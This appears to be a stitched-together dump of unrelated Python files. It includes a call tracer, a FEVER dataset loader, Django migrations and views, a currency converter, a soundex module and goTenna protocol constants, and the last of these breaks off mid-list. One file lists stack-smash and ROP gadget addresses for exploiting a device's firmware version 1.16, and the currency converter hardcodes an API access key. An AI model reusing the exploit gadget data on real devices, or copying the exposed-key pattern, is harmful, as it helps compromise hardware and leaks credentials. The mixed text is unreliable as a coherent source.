k_atp = 4 k_ppi = 1 import sys, os, collections, linecache, prettyprinter, stackprinter, inspect from functools import singledispatchmethod, cached_property from toolz.functoolz import compose_left from itertools import count from typing import Union, TypeVar from types import CodeType from hunter.const import SYS_PREFIX_PATHS from hdlogger.utils import * COL=80 class BaseEvt: def indent(self,char='\u0020',length=0): if length: return char * length else: return char * ((len(self.stack)-1)) def static(self,static_vars): count,filename,lineno,event = static_vars s = f"i:{count:<4} ☰:{len(self.stack):<3}, {event[0]}{filename}.{lineno:<4}" return s def pseudo_static(self,symbol): s = f"{self.indent()}{symbol}" return s @property def nonstatic(self): function, f_locals = self.function, self.f_locals fmtdlns = prettyprinter.pformat(f_locals).splitlines() _first,*_rest = fmtdlns joinstr = '\n' + self.indent(length=len(function)) rv = f"{function}{_first}\n{joinstr.join(_rest)}\n" return rv nonstatic_first = True def nonstatic_rightpad(self,static_vars,depth=None): wf(f"{static_vars=}\n",'logs/nonstatic_rpad.first.log','a') def _special_cases(lines): # Union[False,Any] """hardcoded logic for unique cases case1: len(lines) == 0 case2: len(lines) == 1 case3: len(lines) >= 2 """ wf(f"{lines=}\n",'logs/_special_cases.log','a') if len(lines) == 0: return self.nonstatic if len(lines) == 1: line0 = lines[0] s = ( f"{idt}{self.symbol}" f"{line0:<{80-len(idt)}.{80-len(idt)}}|" f"├{self.static(static_vars)}┤" ) return s if len(lines) >= 2: return False s = stackprinter.format() wf(s, f"logs/nonstatic_rpad.error.log",'a') return SystemExit(f"error in nonstatic_rpad: fucked logic") def firstline(fl): s = ( f"{idt}{self.symbol}" f"{fl:<{80-len(idt)}.{80-len(idt)}}|" f"├{self.static(static_vars)}┤" ) return s def formatlines(rls): l = [ (f"{self.indent()} ." 
f"|{elm:<{ 80-(len(self.indent())) }}|" f"├{self.static(static_vars)}┤") for elm in rls] return '\n'.join(l) idt = self.indent() lines = self.nonstatic.strip().splitlines() if len(lines) == 0: return self.nonstatic if len(lines) == 1: return firstline(lines[0]) if len(lines) >= 2: first = firstline(lines[0]) rest = formatlines(lines[1:]) fmtdlines = f"{first}\n{rest}\n" return fmtdlines s = stackprinter.format(sys.exc_info()) wf(s, f"logs/nonstatic_rightpad.log",'a') raise SystemExit(f"nonstatic_rightpad.{__name__}") class CallEvt(BaseEvt): symbol = "=>" def __init__(self, function=None, f_locals=None, callargs=None, varnames=None, stack=None): assert isinstance(f_locals,dict) self.function = function self.f_locals = f_locals self.callargs = callargs self.varnames = varnames self.stack = stack self.pid = id(self) def __str__(self): function, f_locals, pid = self.function, self.f_locals, self.pid assert isinstance(f_locals,dict) s = f"" return s def __iter__(self): return ((k,v) for k,v in self.__dict__.items()) @property def pseudo_static(self): symbol = "=>" pseudo = super().pseudo_static(symbol) return pseudo @property def nonstatic(self): function, callargs = self.function, self.callargs fmtdlns = prettyprinter.pformat(self.callargs).splitlines() _first_as_str,*_rest_as_list = fmtdlns joinstr = '\n' + self.indent(length=len(function)) rv = f"{function}{_first_as_str}\n{joinstr.join(_rest_as_list)}\n" return rv def pformat(self,count,filename,lineno,event): static_vars = (count,filename,lineno,event) s = f"{self.static(static_vars)}{self.pseudo_static}{self.nonstatic}" s2 = f"{self.pseudo_static}{self.nonstatic}" return s2 class LineEvt(BaseEvt): symbol = " _" def __init__(self, source=None, stack=None): self.source = source self.stack = stack self.pid = id(self) def __str__(self): source, pid = self.source, self.pid s = f"" return s def __iter__(self): return ((k,v) for k,v in self.__dict__.items()) def indent(self,char='\u0020'): idt = char * (len(self.stack)+1) return idt @property def pseudo_static(self): symbol = " _" pseudo = super().pseudo_static(symbol) return pseudo @property def nonstatic(self): source = self.source return source def pformat(self,count,filename,lineno,event): static_vars = (count,filename,lineno,event) s = f"{self.static(static_vars)}{self.pseudo_static}{self.nonstatic}" s2 = f"{self.pseudo_static}{self.nonstatic}" return s2 class RetnEvt(BaseEvt): symbol = "<=" def __init__(self, function, arg, stack=None): self.function = function self.arg = arg self.stack = stack self.id = id(self) def __str__(self): function, arg, pid = self.function, self.arg, self.pid s = f"" return s def __iter__(self): return ((k,v) for k,v in self.__dict__.items()) @property def pseudo_static(self): symbol = "<=" pseudo = super().pseudo_static(symbol) return pseudo @property def nonstatic(self): function, arg = self.function, self.arg fmtdlns = prettyprinter.pformat(arg).splitlines() _first,*_rest = fmtdlns joinstr = '\n' + self.indent(length=len(function)) rv = f"{function}{_first}\n{joinstr.join(_rest)}\n" return rv def pformat(self,count,filename,lineno,event): static_vars = (count,filename,lineno,event) s = f"{self.static(static_vars)}{self.pseudo_static}{self.nonstatic}" s2 = f"{self.pseudo_static}{self.nonstatic}" return s2 class ExcpEvt(BaseEvt): symbol = " !" 
def __init__(self, function, arg, stack=None): self.function = function self.arg = arg self.stack = stack self.id = id(self) def __str__(self): function, arg, pid = self.function, self.arg, self.pid s = f"" return s def __iter__(self): return ((k,v) for k,v in self.__dict__.items()) @property def pseudo_static(self): symbol = " !" pseudo = super().pseudo_static(symbol) return pseudo @property def nonstatic(self): function, arg = self.function, self.arg fmtdlns = prettyprinter.pformat(arg).splitlines() _first,*_rest = fmtdlns joinstr = '\n' + self.indent(length=len(function)) rv = f"{function}{_first}\n{joinstr.join(_rest)}\n" return rv def pformat(self,count,filename,lineno,event): static_vars = (count,filename,lineno,event) s = f"{self.static(static_vars)}{self.pseudo_static}{self.nonstatic}" s2 = f"{self.pseudo_static}{self.nonstatic}" return s2 class State: SYS_PREFIX_PATHS = set(( sys.prefix, sys.exec_prefix, os.path.dirname(os.__file__), os.path.dirname(collections.__file__),)) _counter = count(0) def __init__(self, frame, event, arg): # wf(repr(arg)+"\n",'logs/01.initial_arg.state.log', 'a') # TODO: must uncomment self.frame = frame self.event = event self.arg = arg self.callargs = {a:inspect.getargvalues(frame).locals[a] for a in inspect.getargvalues(frame).args} self.st_count = next(State._counter) self.initialize() def initialize(self): self.locals = self.frame.f_locals self.globals = self.frame.f_globals self.function = self.frame.f_code.co_name self.function_object = self.frame.f_code self.module = self.frame.f_globals.get('__name__','') self.filename = self.frame.f_code.co_filename self.lineno = self.frame.f_lineno self.code = self.frame.f_code self.stdlib = True if self.filename.startswith(SYS_PREFIX_PATHS) else False self.source = linecache.getline(self.filename, self.lineno, self.frame.f_globals) self.stack = None self._call = None self._line = None self._return = None self._exception = None self._serialized_arg = None self._serialized_locals = None @cached_property def format_filename(self): if not isinstance(self.filename,Path): filename = Path(self.filename) stem = f"{filename.stem:>10.10}" return stem _stack = [] @property def format_call(self): raise NotImplementedError("Must implement PickleableState.format_call") @property def format_line(self): raise NotImplementedError("Must implement PickleableState.format_line") @property def format_return(self): raise NotImplementedError("Must implement PickleableState.format_return") @property def format_exception(self): raise NotImplementedError("Must implement PickleableState.format_exception") class PickleableFrame: def __init__(self, kwds): self.filename = kwds['filename'] self.lineno = kwds['lineno'] self.function = kwds['function'] self.local_vars = kwds['local_vars'] self.code_context = kwds['code_context'] self.st_count = kwds['count'] self.f_code = kwds['f_code'] def __str__(self,color=False): return prettyprinter.pformat(self.__dict__) class PickleableState: def __init__(self, kwds): self.attrs = list(kwds.keys()) self.frame: PickleableFrame = kwds['frame'] self.event: str = kwds['event'] self.arg: Any = kwds['arg'] self.callargs: List = kwds['callargs'] self.f_locals: Dict = kwds['f_locals'] self.f_code = self.frame.f_code self.st_count: int = kwds['st_count'] self.function: str = kwds['function'] self.module: str = kwds['module'] self.filename: str = kwds['format_filename'] self.lineno: int = kwds['lineno'] self.stdlib: bool = kwds['stdlib'] self.source: str = kwds['source'] self.stack: List[str] = kwds['stack'] def 
__str__(self): l = [] for attr in self.attrs: l.append(f"{attr}={getattr(self,attr,'None')}") s = "\n".join(l) return s def __iter__(self): return ((k,v) for k,v in self.asdict().items()) def asdict(self): return self.__dict__ @property def indent(self): idt = '\u0020' * (len(PickleableState._stack)-1) return idt _stack = [] @property def format_call(self): PickleableState._stack.append(f"{self.module}.{self.function}") self.stack = PickleableState._stack[:] callevt = CallEvt( self.function, self.f_locals, self.callargs, self.f_code.co_varnames[:self.f_code.co_argcount], self.stack ) static_vars = (self.st_count,self.filename,f"{self.lineno:<5}",self.event) static,pseudo,nonsta = callevt.static(static_vars),callevt.pseudo_static,callevt.nonstatic return static+pseudo+nonsta def pkl_format_call(self): PickleableState._stack.append(f"{self.module}.{self.function}") self.stack = PickleableState._stack[:] callevt = CallEvt( self.function, self.f_locals, self.callargs, self.f_code.co_varnames[:self.f_code.co_argcount], self.stack ) static_vars = (self.st_count,self.filename,f"{self.lineno:<5}",self.event) static,pseudo,nonsta = callevt.static(static_vars),callevt.pseudo_static,callevt.nonstatic return (static, pseudo, nonsta) @property def format_line(self): lineevt = LineEvt(self.source, self.stack) static_vars = (self.st_count,self.filename,f"{self.lineno:<5}",self.event) static,pseudo,nonsta = lineevt.static(static_vars),lineevt.pseudo_static,lineevt.nonstatic self.stack = PickleableState._stack[:] return static+pseudo+nonsta def pkl_format_line(self): lineevt = LineEvt(self.source, self.stack) static_vars = (self.st_count,self.filename,f"{self.lineno:<5}",self.event) static,pseudo,nonsta = lineevt.static(static_vars),lineevt.pseudo_static,lineevt.nonstatic self.stack = PickleableState._stack[:] return (static, pseudo, nonsta) @property def format_return(self): retnevt = RetnEvt(self.function, self.arg, self.stack) static_vars = (self.st_count,self.filename,f"{self.lineno:<5}",self.event) static,pseudo,nonsta = retnevt.static(static_vars),retnevt.pseudo_static,retnevt.nonstatic # if PickleableState._stack and PickleableState._stack[-1] == f"{self.module}.{self.function}": # PickleableState._stack.pop() if PickleableState._stack: PickleableState._stack.pop() self.stack = PickleableState._stack[:] return static+pseudo+nonsta def pkl_format_return(self): retnevt = RetnEvt(self.function, self.arg, self.stack) static_vars = (self.st_count,self.filename,f"{self.lineno:<5}",self.event) static,pseudo,nonsta = retnevt.static(static_vars),retnevt.pseudo_static,retnevt.nonstatic if PickleableState._stack: PickleableState._stack.pop() self.stack = PickleableState._stack[:] return (static, pseudo, nonsta) @property def format_exception(self): excpevt = ExcpEvt(self.function, self.arg, self.stack) static_vars = (self.st_count,self.filename,f"{self.lineno:<5}",self.event) static,pseudo,nonsta = excpevt.static(static_vars),excpevt.pseudo_static,excpevt.nonstatic self.stack = PickleableState._stack[:] return static+pseudo+nonsta def pkl_format_exception(self): excpevt = ExcpEvt(self.function, self.arg, self.stack) static_vars = (self.st_count,self.filename,f"{self.lineno:<5}",self.event) static,pseudo,nonsta = excpevt.static(static_vars),excpevt.pseudo_static,excpevt.nonstatic self.stack = PickleableState._stack[:] return (static, pseudo, nonsta) class PickleableGenerator: def __init__(self,state,f_locals,pid): self.state = state self.locals = f_locals self.pid = pid def __str__(self): state, f_locals, pid = 
self.state, self.locals, self.pid s = f"" return s class PickleableEnviron: def __init__(self, kwds): d = {} for k,v in kwds.items(): if ':' in v: v = prettyprinter.pformat(v.split(':')) # if k == "LS_COLORS": v = prettyprinter.pformat(v.split(':')) setattr(self, k, kwds[k]) def __str__(self,color=False): return prettyprinter.pformat(self.__dict__) class PickleableTraceback: def __init__(self,lasti,lineno): self.lasti = lasti self.lineno = lineno class GenericPickleableMapping: pass class PickleableOptparseOption: def __init__(self,module,classname): self.module = module self.classname = classname self.id = id(self) # 0x%x: def __iter__(self): return ((k,v) for k,v in self.__dict__.items()) def __str__(self): l = [] for k,v in self.__dict__.items(): l.append(f"{k}={v}") s = f"{self.module}.{self.classname}, {id=}" return s 1-10 import os from torch.utils.data import Dataset, DataLoader from transformers import BertTokenizer import configs from src.data_utils import read_lines, process_jsonl2io_parallel class FeverDatasetFinetune(Dataset): def __init__(self, filepath, max_length=512, padding='max_length', truncation=True): super(FeverDatasetFinetune, self).__init__() lines = read_lines(filepath) # Tuple of input, class label self.dataset = process_jsonl2io_parallel(lines) self.tokenizer = BertTokenizer.from_pretrained('bert-base-uncased') self.padding = padding self.truncation = truncation self.max_length = max_length def __len__(self): return len(self.dataset) def __getitem__(self, index): input_sentence = self.dataset[index][0] class_label = self.dataset[index][1] encoded_input = self.tokenizer(text=input_sentence, max_length=self.max_length, padding=self.padding, truncation=self.truncation, return_tensors="pt" ) return encoded_input, class_label class FeverDatasetEditor(Dataset): def __init__(self, filepath, max_length=512, padding='max_length', truncation=True): super(FeverDatasetEditor, self).__init__() lines = read_lines(filepath) dataset = FeverDatasetFinetune(os.path.join(configs.DATA_DIR, 'fever', 'dev.jsonl')) print(dataset) dev_loader = DataLoader(dataset, batch_size=1, shuffle=True) kevangel79/poem-20 # Generated by Django 2.2.5 on 2019-10-14 11:17 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('poem_super_admin', '0001_initial'), ] operations = [ migrations.RemoveField( model_name='metrictemplate', name='cloned', ), ] """ @Time : 202/16/19 16:33 @Author : TaylorMei @Email : @Project : iccv @File : compute_overlap.py @Function: """ import os import numpy as np import skimage.io import skimage.transform import matplotlib.pyplot as plt from matplotlib import cm import seaborn as sns image_path = '/home/iccd/data/msd9/test/image/' mask_json_path = '/home/iccd/data/msd9/test/mask/' # image_path = '/home/iccd/data/2019/msd9_all/all_images/' # mask_json_path = '/home/iccd/data/2019/msd9_all/all_masks/' imglist = os.listdir(image_path) print(len(imglist)) overlap = np.zeros([256, 256], dtype=np.float64) tall, wide = 0, 0 for i, imgname in enumerate(imglist): print(i, imgname) name = imgname.split('.')[0] mask = skimage.io.imread(mask_json_path + name + '.png') height = mask.shape[0] width = mask.shape[1] if height > width: tall += 1 else: wide += 1 mask = skimage.transform.resize(mask, [256, 256], order=0) mask = np.where(mask != 0, 1, 0).astype(np.float64) overlap += mask overlap = overlap / len(imglist) overlap_normalized = (overlap - np.min(overlap)) / (np.max(overlap) - np.min(overlap)) skimage.io.imsave('./msd9_test.png', 
(overlap*255).astype(np.uint8)) skimage.io.imsave('./msd9_test_normalized.png', overlap_normalized) print(tall, wide) f, ax = plt.subplots() sns.set() ax = sns.heatmap(overlap, ax=ax, cmap=cm.summer, cbar=False) ax.set_xticklabels([]) ax.set_yticklabels([]) plt.xticks([]) plt.yticks([]) plt.show() viniaraujoo/Recommender-system /anaconda2/lib/python2.7/os.py# -*- coding: utf-8 -*- from __future__ import absolute_import, unicode_literals from django.shortcuts import redirect, render from django.core.urlresolvers import reverse from django.contrib import messages from django.contrib.messages.views import SuccessMessageMixin from django.views.generic import DetailView, ListView, RedirectView, \ UpdateView, CreateView from django.contrib.auth.mixins import LoginRequiredMixin from .models import User from .models import Feedback from .forms import FeedbackForm class UserFeedback(LoginRequiredMixin, SuccessMessageMixin, CreateView): #success_message = 'Thanks for contacting us, we will get back to you # shortly.' def feedback(request): if request.method == "POST": form = FeedbackForm(request.POST) if form.is_valid(): feedback = form.save(commit=False) feedback.user = request.user feedback.save() messages.success(request, '') return reverse('comunity') #return reverse('users:detail', # kwargs={'username': request.user.username}) # 'email': request.user.email, else: form = FeedbackForm()# return render(request, 'users/user_feedback.html', { 'user': request.user.name, 'form': form }) class UserDetailView(LoginRequiredMixin, DetailView): model = User slug_field = 'username' slug_url_kwarg = 'username' class UserRedirectView(LoginRequiredMixin, RedirectView): permanent = False def get_redirect_url(self): return reverse('users:detail', kwargs={'username': self.request.user.username}) class UserUpdateView(LoginRequiredMixin, UpdateView): fields = ['name', ] model = User # send the user back to their own page after a successful update def get_success_url(self): return reverse('users:detail', kwargs={'username': self.request.user.username}) def get_object(self): # Only get the User record for the user making the request return User.objects.get(username=self.request.user.username) class UserListView(LoginRequiredMixin, ListView): model = User slug_field = 'username' slug_url_kwarg = 'username' LowerDeez/ok-redirectsok_redirects/migrations/0005_auto_20210112_0814.py # Generated by Django 2.1.4 on 2021-01-12 08:14 from django.db import migrations, models import ok_redirects.fields class Migration(migrations.Migration): dependencies = [ ('ok_redirects', '0004_auto_20201218_1122'), ] operations = [ migrations.AddField( model_name='redirect', name='to_language', field=models.CharField(blank=True, choices=[('en', 'English'), ('ru', 'Russian'), ('uk', 'Ukraine')], help_text='Leave blank to redirect to an activated language', max_length=5, verbose_name='to language'), ), migrations.AlterField( model_name='redirect', name='languages', field=ok_redirects.fields.MultipleChoiceArrayField(base_field=models.CharField(blank=True, choices=[('en', 'English'), ('ru', 'Russian'), ('uk', 'Ukraine')], max_length=2), blank=True, default=['en', 'ru', 'uk'], size=None, verbose_name='Languages to check redirect'), ), ] # Values here for firmware version 1.16 # I've spent more time analyzing this version so far, # but it seems to be relatively rare. Seems to come from # a newer Mask ROM production batch. 
# This should be reading from a var we can try writing word_addr = 0x3ae # An okay place to return from the stack smash mainloop_safe_spot = 0x818 # RAM addresses factory_temp_ram = 0x100 ep1_buffer = 0x280 stack_base = 0x443 timer0_funcptr = 0x39d rop_addr = 0x500 counter_addr = 0x38c ep1flags = 0x1D scanflags = 0x14 adc_result = 0x3a1 scan_postadc_callback = 0x39d # Code gadgets ret = 0x244 infinite_loop = 0x1ac ldw_spl_popw_r0 = 0x26f1 popw_spl_r0 = 0x7d8 popw_r0 = 0x2a2c popw_r3 = 0xe1b popw_r2_r3_r4 = 0x13cb copy_codememR3_ramR2_countR4 = 0x2a30 stw_r3_ep0ack_ld04_popw_r2_r4_r5_r7_r6 = 0x23ec st_r1_ep0ackstall_popw_r2 = 0x1e42 timer0_disable = 0x29ca timer0_set_funcR3_timeoutR2 = 0x2983 adc_shutdown = 0xb89 memcpy_destR2_srcR3_countR4 = 0x29e0 feb0_loader = 0xb97 ep1sta_bit3_set = 0x25e1 wcon_set_D1h = 0xb82 incw_counter_popw_r2_r3_r4 = 0x13c8 r0_to_counter_popw_r2_r3 = 0xe12 pwm0_disable = 0x2f87 pwm1_disable = 0x2f11 # Lookup table for finding arbitrary bytes in code memory # missing values: 52 D2 byte_gadgets = [ 0x0044, 0x0002, 0x00a1, 0x009f, 0x009e, 0x009d, 0x0128, 0x009c, 0x009b, 0x009a, 0x0176, 0x0025, 0x0098, 0x00b2, 0x0097, 0x0096, 0x00be, 0x0095, 0x00ca, 0x0094, 0x00d2, 0x0093, 0x00dc, 0x0092, 0x00e4, 0x0091, 0x00ec, 0x0090, 0x00f4, 0x00f8, 0x008f, 0x0102, 0x0000, 0x010a, 0x010e, 0x008d, 0x01dd, 0x008c, 0x02da, 0x0258, 0x008b, 0x0259, 0x0015, 0x002d, 0x0045, 0x0089, 0x04fb, 0x025c, 0x0088, 0x02df, 0x025d, 0x004c, 0x025e, 0x0086, 0x025f, 0x02e2, 0x0085, 0x0261, 0x02e4, 0x0084, 0x02e5, 0x0263, 0x0083, 0x0220, 0x03f1, 0x0082, 0x0173, 0x0160, 0x0081, 0x0267, 0x07b8, 0x0080, 0x07eb, 0x02eb, 0x007f, 0x02ec, 0x026a, 0x007e, 0x0139, 0x01d8, 0x026c, 0x007d, None, 0x026e, 0x007c, 0x026f, 0x0839, 0x007b, 0x0589, 0x0271, 0x007a, 0x0272, 0x02f5, 0x0079, 0x1544, 0x0274, 0x0078, 0x02f7, 0x0275, 0x0077, 0x0276, 0x02f9, 0x0277, 0x0076, 0x01b6, 0x0279, 0x0075, 0x027a, 0x063e, 0x0074, 0x1be0, 0x027c, 0x0073, 0x02ff, 0x0001, 0x0072, 0x0301, 0x027f, 0x0071, 0x0280, 0x05ca, 0x0070, 0x1ad8, 0x0304, 0x006f, 0x0305, 0x0283, 0x006e, 0x01df, 0x006d, 0x01be, 0x01b9, 0x006c, 0x01b7, 0x0014, 0x006b, 0x01b8, 0x0187, 0x006a, 0x028a, 0x0069, 0x028b, 0x030e, 0x0068, 0x030f, 0x0067, 0x01e5, 0x028e, 0x0066, 0x028f, 0x0065, 0x0175, 0x0185, 0x0064, 0x0291, 0x0063, 0x0315, 0x0062, 0x0316, 0x0061, 0x0186, 0x0060, 0x0295, 0x005f, 0x0296, 0x005e, 0x005d, 0x0298, 0x005c, 0x005b, 0x0148, 0x005a, 0x0059, 0x0058, 0x014e, 0x0057, 0x0056, 0x0054, 0x0053, 0x0051, 0x004e, 0x0034, 0x02a0, 0x0b2d, 0x0242, 0x02a1, 0x02a2, 0x02a3, 0x0610, 0x02a4, 0x0327, 0x02a5, 0x037d, 0x02a6, 0x1875, 0x02a7, 0x032a, 0x02a8, 0x032b, 0x02a9, 0x07f0, 0x02aa, 0x02ab, 0x032e, 0x02ac, 0x0b64, 0x02ad, 0x0331, 0x02ae, 0x02af, None, 0x02b0, 0x001c, 0x02b1, 0x02b2, 0x0335, 0x02b3, 0x003c, 0x013c, 0x0337, 0x0338, 0x02b5, 0x02b6, 0x01aa, 0x02b7, 0x02b8, 0x19f7, 0x033c, 0x02b9, 0x02ba, 0x0747, 0x0745, 0x02bc, 0x02bd, 0x02be, 0x0740, 0x02bf, 0x0757, 0x0024, 0x0343, 0x02c1, 0x02c2, 0x02c3, 0x0346, 0x02c4, 0x0347, 0x02c5, 0x0191, 0x05f2, 0x0737, 0x0736, 0x075f, 0x06bb, 0x0784, 0x0177, 0x0003 ] Mirza-Samad-Ahmed-Baig/PYTHON_GUI_PROJECTS import tkinter as tk from tkinter import * from tkinter import ttk from datetime import datetime import requests from PIL import ImageTk, Image from tkinter import messagebox root = tk.Tk() root.geometry("600x270") root.title("Currency Converter") root.iconbitmap('icon.ico') root.maxsize(600,270) root.minsize(600,270) image = Image.open('currency.png') zoom = 0.5 #multiple image size by zoom pixels_x, pixels_y = 
tuple([int(zoom * x) for x in image.size]) img = ImageTk.PhotoImage(image.resize((pixels_x, pixels_y))) panel = Label(root, image = img) panel.place(x=190,y=35) def show_data(): amount = E1.get() from_currency = c1.get() to_currency = c2.get() url = 'http://api.currencylayer.com/live?access_key=4273d2c37f738367f08780b934ce7dda&format=1' if amount == '': messagebox.showerror("Currency Converter", "Please Fill the Amount") elif to_currency == '': messagebox.showerror("Currency Converter", "Please Choose the Currency") else: data = requests.get(url).json() currency = from_currency.strip()+to_currency.strip() amount = int(amount) cc = data['quotes'][currency] cur_conv = cc*amount E2.insert(0,cur_conv) text.insert('end',f'{amount} United State Dollar Equals {cur_conv} {to_currency} \n\n Last Time Update --- \t {datetime.now()}') def clear(): E1.delete(0,'end') E2.delete(0,'end') text.delete(1.0,'end') l1 = Label(root,text="USD Currency Converter Using Python", font=('verdana','10','bold')) l1.place(x=150,y=15) amt = Label(root,text="Amount",font=('roboto',10,'bold')) amt.place(x=20,y=15) E1 = Entry(root,width=20,borderwidth=1,font=('roboto',10,'bold')) E1.place(x=20,y=40) c1 = tk.StringVar() c2 = tk.StringVar() currencychoose1 = ttk.Combobox(root, width = 20, textvariable = c1, state='readonly',font=('verdana',10,'bold')) # Adding combobox drop down list currencychoose1['values'] = ( ' USD', ) currencychoose1.place(x=300,y=40) currencychoose1.current(0) E2 = Entry(root,width=20,borderwidth=1,font=('roboto',10,'bold')) E2.place(x=20,y=80) currencychoose2 = ttk.Combobox(root, width = 20, textvariable = c2, state='readonly',font=('verdana','10','bold')) # Adding combobox drop down list currencychoose2['values'] =('ALL', ' AFN', ' ARS', ' AWG', ' AUD', ' AZN', ' BSD', ' BBD', ' BYN', ' BZD ', ' BMD', ' BOB', 'BAM', ' BWP', ' BGN', ' BND', ' KHR', ' CAD', ' KYD', ' CLP', ' CNY', ' COP ', ' CRC', ' HRK', 'CUP', 'CZK', ' DKK', ' DOP', ' XCD', ' EGP', ' SVC', ' EUR', ' FKP', ' FJD', ' GHS ', ' GIP', ' GTQ', 'GGP', ' GYD', ' HNL ', ' HKD', ' HUF', ' ISK', ' INR', ' IDR', ' IRR', ' IMP ', ' ILS', ' JMD', 'JPY', 'KZT', ' KPW', ' KRW', ' KGS', ' LAK', ' LBP', ' LRD', ' MKD', ' MYR', ' MUR ', ' MXN', ' MNT', 'MZN', ' NAD', ' NPR', ' ANG', ' NZD ', ' NIO ', ' NGN', ' NOK', ' OMR ', ' PKR ', ' PAB', ' PYG', 'PEN', 'PHP', ' PLN', ' QAR', ' RON', ' RUB', ' SHP', ' SAR', ' RSD', ' SCR ', ' SGD ', ' SBD', ' SOS', 'ZAR', ' LKR', ' SEK ', ' CHF', ' SRD', ' SYP', ' TWD', ' THB', ' TTD', ' TRY ', ' TVD', ' UAH', 'GBP ', ' UYU', ' UZS ', ' VEF ', ' VND', ' YER', 'ZWD',) currencychoose2.place(x=300,y=80) currencychoose2.current() text = Text(root,height=7,width=52,font=('verdana','10','bold')) text.place(x=100,y=120) B = Button(root,text="Search",command=show_data,font=('verdana','10','bold'),borderwidth=2,bg="red",fg="white") B.place(x=20,y=120) clear = Button(root,text="Clear",command=clear,font=('verdana','10','bold'),borderwidth=2,bg="blue",fg="white") clear.place(x=20,y=170) root.mainloop() # <============ end code ==============>ryan12900/Test-Behavior-Driven-Development # -*- coding: utf-8 -*- ''' soundex ~~~~~~~~ This module implements soundex algorithm components. 
:copyright: (c) 2009-2012 by :copyright: (c) 2012-2014 by SILPA Developers :license: LGPL-3.0+, see LICENSE file for more details ''' _all_ = ["Soundex", "getInstance"] from itertools import repeat from silpa_common import servicemethod from silpa_common.charmap import get_language, charmap ''' Soundex class provides methods which can be used to perform Soundex phonetic algorithm on Indian languages as well as English. ''' _soundex_map = { "soundex_en": ["0", "1", "2", "3", "0", "1", "2", "0", "0", "2", "2", "4", "5", "5", "0", "1", "2", "6", "2", "3", "0", "1", "0", "2", "0", "2"], "soundex": ['0', 'N', '0', '0', 'A', 'A', 'B', 'B', 'C', 'C', 'P', 'Q', '0', 'D', 'D', 'D', 'E', 'E', 'E', 'E', 'F', 'F', 'F', 'F', 'G', 'H', 'H', 'H', 'H', 'G', 'I', 'I', 'I', 'I', 'J', 'K', 'K', 'K', 'K', 'L', 'L', 'M', 'M', 'M', 'M', 'N', 'O', 'P', 'P', 'Q', 'Q', 'Q', 'R', 'S', 'S', 'S', 'T', '0', '0', '0', '0', 'A', 'B', 'B', 'C', 'C', 'P', 'P', 'E', 'D', 'D', 'D', 'D', 'E', 'E', 'E', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', 'E', '0', '0', '0', '0', '0', '0', '0', '0', 'P', 'Q', 'Q', 'Q', '0', '0', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', 'J', 'J', 'Q', 'P', 'P', 'F'], } class Soundex(object): def soundexCode(self, char): '''Return the soundex code for given character :param char: Character whose soundex code is needed :return: Returns soundex code if character is found in charmap else returns 0 ''' lang = get_language(char) try: if lang == "en_US": return _soundex_map["soundex_en"][charmap[lang].index(char)] else: return _soundex_map["soundex"][charmap[lang].index(char)] except: # Case of exception KeyError because we don't have soundex # mapping for the character pass return 0 @servicemethod def soundex(self, name, length=8): '''Calculate soundex of given string This function calculates soundex for Indian language string as well as English string. This function is exposed as service method for JSONRPC in SILPA framework. :param name: String whose Soundex value to be calculated :param length: Length of final Soundex string, if soundex caculated is more than this it will be truncated to length. :return: Soundex string of `name' ''' sndx = [] fc = name[0] # translate alpha chars in name to soundex digits for c in name[1:].lower(): d = str(self.soundexCode(c)) # remove all 0s from the soundex code if d == '0': continue # duplicate consecutive soundex digits are skipped if len(sndx) == 0: sndx.append(d) elif d != sndx[-1]: sndx.append(d) # append first character to result sndx.insert(0, fc) if get_language(name[0]) == 'en_US': # Don't padd return ''.join(sndx) if len(sndx) < length: sndx.extend(repeat('0', length)) return ''.join(sndx[:length]) return ''.join(sndx[:length]) @servicemethod def compare(self, string1, string2): '''Compare soundex of given strings This function checks if 2 given strings are phonetically sounds same by doing soundex code comparison :param string1: First string for comparison :param string2: Second string for comparison :return: Returns 0 if both strings are same, 1 if strings sound phonetically same, 2 if strings are phonetically not same. We can't perform English cross language comparision if English string is passed as one function will return -1. 
''' # do a quick check if string1 == string2: return 0 string1_lang = get_language(string1[0]) string2_lang = get_language(string2[0]) if (string1_lang == 'en_US' and string2_lang != 'en_US') or \ (string1_lang != 'en_US' and string2_lang == 'en_US'): # Can't Soundex compare English and Indic string return -1 soundex1 = self.soundex(string1) soundex2 = self.soundex(string2) if soundex1[1:] == soundex2[1:]: # Strings sound phonetically same return 1 # Strings are not same return 2 def getInstance(): ''' Return Soundex instance This function returns instance of Soundex class and is used mainly by SILPA framework :return: Soundex instance ''' return Soundex() #!/usr/bin/env python # encoding: utf-8 """Group Polls 2 # Polls """ class d: """Group Question 2 ## Choice [/questions/{question_id}/choices/{choice_id}] + Parameters + question_id: 1 (required, number) - ID of the Question in form of an integer + choice_id: 1 (required, number) - ID of the Choice in form of an integer ### Vote on a Choice [POST] This action allows you to vote on a question's choice. + Response 201 + Headers Location: /questions/1 """ def e(): """Group Question 4 ### Create a New Question [POST] You may create your own question using this action. It takes a JSON object containing a question and a collection of answers in the form of choices. + question (string) - The question + choices (array[string]) - A collection of choices. + Request (application/json) { "question": "Favourite programming language?", "choices": [ "Swift", "Python", "Objective-C", "Ruby" ] } + Response 201 (application/json) + Headers Location: /questions/2 + Body { "question": "Favourite programming language?", "published_at": "2014-11-11T08:40:51.620Z", "url": "/questions/2", "choices": [ { "choice": "Swift", "url": "/questions/2/choices/1", "votes": 0 }, { "choice": "Python", "url": "/questions/2/choices/2", "votes": 0 }, { "choice": "Objective-C", "url": "/questions/2/choices/3", "votes": 0 }, { "choice": "Ruby", "url": "/questions/2/choices/4", "votes": 0 } ] } """ joshuafuller/pyGT """ goTenna App objects - part of pyGT https://github.com/sybip/pyGT """ from struct import pack, unpack from pyTLV import tlvPack, tlvRead from pycrc16 import crc from gtdefs import * # noqa: F403 # Message content types - GTA specific GTA_CONTENT_TEXT = 0 GTA_CONTENT_TEXT_LCTN = 1 # Text message with location attached GTA_CONTENT_LCTN_RES = 2 # Location response GTA_CONTENT_LCTN_REQ = 3 # Location request GTA_CONTENT_TEXT_LREQ = 4 # Text message with location request GTA_CONTENT_GROUP_KEY = 5 # Group setup information: GID, KEY and members GTA_CONTENT_PING = 7 # Ping request GTA_CONTENT_PUBK_REQ = 14 